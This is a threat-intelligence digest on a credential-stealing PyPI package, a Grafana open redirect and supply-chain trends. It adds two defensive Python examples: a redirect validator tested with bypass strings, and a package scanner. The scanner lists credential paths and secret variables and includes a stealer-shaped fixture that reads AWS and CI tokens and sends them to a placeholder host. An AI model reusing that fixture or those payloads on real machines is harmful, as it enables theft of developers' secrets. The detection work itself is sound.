Major Incidents or Breaches

  • A malicious package was discovered on the Python Package Index (PyPI), masquerading as the legitimate Chimera module. The package is built to harvest developer and cloud secrets, including AWS credentials, CI/CD secrets, and macOS system data, from the machine it is installed on.

Newly Discovered Vulnerabilities

  • Over 46,000 internet-facing Grafana instances remain unpatched against a client-side open redirect vulnerability. By luring a user to a crafted link, an attacker can have the instance load a malicious plugin, which can lead to account takeover.
  • Microsoft acknowledged that the June 2025 Windows Server security updates are causing the DHCP Server service to freeze on some systems, which can leave clients unable to obtain or renew IP leases.
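The Grafana item above is an instance of a general bug class: a redirect or resource path is accepted because it "starts with a slash", while browsers treat scheme-relative (`//host`) and backslash (`/\host`) forms as a different origin. The following is an added illustration of that class, not Grafana's code and not a reproduction of its specific flaw; the function names, the hostname `grafana.example.com` and the test inputs are all constructed for the example.

```python
"""Vulnerable vs. hardened validation of a user-supplied redirect target.

Added example; the Grafana issue is only the motivating bug class.
"""
from urllib.parse import unquote, urlsplit


def is_safe_redirect_vulnerable(target: str) -> bool:
    # The naive check: "a leading slash means a local path". Browsers disagree:
    # "//evil.com/x" is scheme-relative and "/\evil.com" is normalised to it.
    return target.startswith("/")


def is_safe_redirect(target: str, allowed_host: str) -> bool:
    # Decode once and fold backslashes to slashes before parsing, so the
    # parser sees what the browser will see.
    normalised = unquote(target).replace("\\", "/")
    parts = urlsplit(normalised)
    if parts.scheme or parts.netloc:
        # Absolute or scheme-relative: only allow https to our own host.
        return parts.scheme == "https" and parts.netloc.lower() == allowed_host.lower()
    # Relative: must be a single-slash local path ("//..." was caught above,
    # but keep the explicit guard so the rule is visible).
    return normalised.startswith("/") and not normalised.startswith("//")


# Constructed inputs exercising the bypasses the naive check misses.
PROBES = {
    "/d/abc?orgId=1": True,                       # ordinary local path
    "//evil.example/plugin.js": False,            # scheme-relative
    "/\\evil.example/plugin.js": False,           # backslash variant
    "/%5Cevil.example/plugin.js": False,          # percent-encoded backslash
    "javascript:alert(1)": False,                 # non-http scheme
    "https://grafana.example.com/d/abc": True,    # same host over https
    "https://evil.example/": False,               # other host
}


def compare(host: str = "grafana.example.com") -> dict[str, tuple[bool, bool]]:
    """Return {target: (vulnerable_verdict, hardened_verdict)} for each probe."""
    return {t: (is_safe_redirect_vulnerable(t), is_safe_redirect(t, host)) for t in PROBES}


if __name__ == "__main__":
    for target, (weak, strong) in compare().items():
        print(f"{target!r:40} naive={weak!s:5} hardened={strong}")
```

Run it and the naive check accepts all three of the `//`, `/\` and `%5C` forms, which is exactly the gap that turns a "local" redirect into a load from an attacker-controlled origin.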

Notable Threat Actor Activity

  • Threat actors are using PyPI to distribute malicious packages that target developer environments and harvest cloud infrastructure credentials.

Trends, Tools, or Tactics of Interest

  • Continued abuse of open-source software repositories, such as PyPI, for supply chain attacks against developer systems and cloud infrastructure.
  • Ongoing problems with timely patching of widely used software, as shown by the large number of internet-facing Grafana instances still exposed to a vulnerability for which a fix is available.
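The PyPI incident under Major Incidents and the supply chain trend above share one practical question: before a package is installed or promoted into a build image, what in its source would have given it away? The script below is an added example, not code from the page or from any named project, of a first-pass static triage of an sdist: it looks for string literals naming credential files and CI/CD secret variables, outbound network calls, dynamic code execution, decoding helpers used for obfuscation, and function calls executed at import time. The tarball, both module bodies, and the 203.0.113.10 endpoint are constructed here for the example.

```python
"""Heuristic static triage of a Python sdist for credential-theft behaviour.

Added example with constructed input; the rules are illustrative, not a
complete detector, and every name here is invented for the demonstration.
"""
import ast
import io
import tarfile
from dataclasses import dataclass

# String literals that point at local secret stores (cloud, k8s, registry, macOS keychain).
SENSITIVE_PATHS = (".aws/credentials", ".aws/config", ".kube/config",
                   ".docker/config.json", "Library/Keychains", ".ssh/id_")
# Environment variables that carry cloud or CI/CD secrets.
SENSITIVE_ENV = {"AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN",
                 "GITHUB_TOKEN", "GITLAB_TOKEN", "CI_JOB_TOKEN", "JENKINS_URL"}
EXFIL_CALLS = {"urlopen", "urlretrieve", "create_connection", "sendall", "post"}
DYNAMIC_EXEC = {"exec", "eval", "compile", "__import__"}
OBFUSCATION = {"b64decode", "a85decode", "decompress", "unhexlify", "fromhex"}


@dataclass
class Finding:
    file: str
    line: int
    rule: str
    detail: str


def _call_name(func: ast.expr) -> str:
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""


def scan_source(filename: str, source: str) -> list[Finding]:
    """Walk one module's AST and return rule hits."""
    try:
        tree = ast.parse(source, filename)
    except SyntaxError as exc:
        return [Finding(filename, exc.lineno or 0, "unparseable", str(exc))]
    out: list[Finding] = []
    # Payloads that run on `import` are the hallmark of this package class.
    for node in tree.body:
        if isinstance(node, ast.Expr) and isinstance(node.value, ast.Call):
            out.append(Finding(filename, node.lineno, "import-time-call", _call_name(node.value.func)))
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            s = node.value
            if any(p in s for p in SENSITIVE_PATHS):
                out.append(Finding(filename, node.lineno, "sensitive-path", s))
            if s in SENSITIVE_ENV:
                out.append(Finding(filename, node.lineno, "sensitive-env", s))
        elif isinstance(node, ast.Call):
            name = _call_name(node.func)
            if name in EXFIL_CALLS:
                out.append(Finding(filename, node.lineno, "network-call", name))
            if name in DYNAMIC_EXEC:
                out.append(Finding(filename, node.lineno, "dynamic-exec", name))
            if name in OBFUSCATION:
                out.append(Finding(filename, node.lineno, "obfuscation", name))
    return out


def scan_sdist(blob: bytes) -> list[Finding]:
    """Scan every .py member of a gzipped sdist tarball held in memory."""
    findings: list[Finding] = []
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile() and member.name.endswith(".py"):
                fh = tar.extractfile(member)
                if fh is not None:
                    findings.extend(scan_source(member.name, fh.read().decode("utf-8", "replace")))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


def is_suspicious(findings: list[Finding]) -> bool:
    # Secret access on its own is common in legitimate tooling; secret access
    # plus an outbound channel is the combination worth a human look.
    rules = {f.rule for f in findings}
    return bool(rules & {"sensitive-path", "sensitive-env"}) and "network-call" in rules


def build_sdist(files: dict[str, str]) -> bytes:
    """Build a gzipped tarball from {path: source} (constructed test fixture)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            data = content.encode()
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed modules: one stealer-shaped, one benign. Not the real package's code.
MALICIOUS_SAMPLE = '''
import os, base64, urllib.request

def check_update():
    home = os.path.expanduser("~")
    data = {}
    try:
        data["aws"] = open(os.path.join(home, ".aws/credentials")).read()
    except OSError:
        pass
    for k in ("AWS_SECRET_ACCESS_KEY", "GITHUB_TOKEN", "CI_JOB_TOKEN"):
        data[k] = os.environ.get(k)
    payload = base64.b64encode(repr(data).encode())
    urllib.request.urlopen("http://203.0.113.10/collect", data=payload)
    exec(base64.b64decode(b"cHJpbnQoJ3gnKQ=="))

check_update()
'''
BENIGN_SAMPLE = '"""Benign helper module."""\n\ndef add(a, b):\n    return a + b\n'
SAMPLE_SDIST = {"example_pkg-0.1/example_pkg/__init__.py": MALICIOUS_SAMPLE,
                "example_pkg-0.1/example_pkg/util.py": BENIGN_SAMPLE}

if __name__ == "__main__":
    hits = scan_sdist(build_sdist(SAMPLE_SDIST))
    for h in hits:
        print(f"{h.file}:{h.line} {h.rule}: {h.detail}")
    print("suspicious:", is_suspicious(hits), summarize(hits))
```

Treat the output as a triage signal, not a verdict: a legitimate cloud SDK reads `.aws/credentials` and talks to the network too, which is why `is_suspicious` asks for both together and why the import-time call is reported separately as the detail a reviewer should read first.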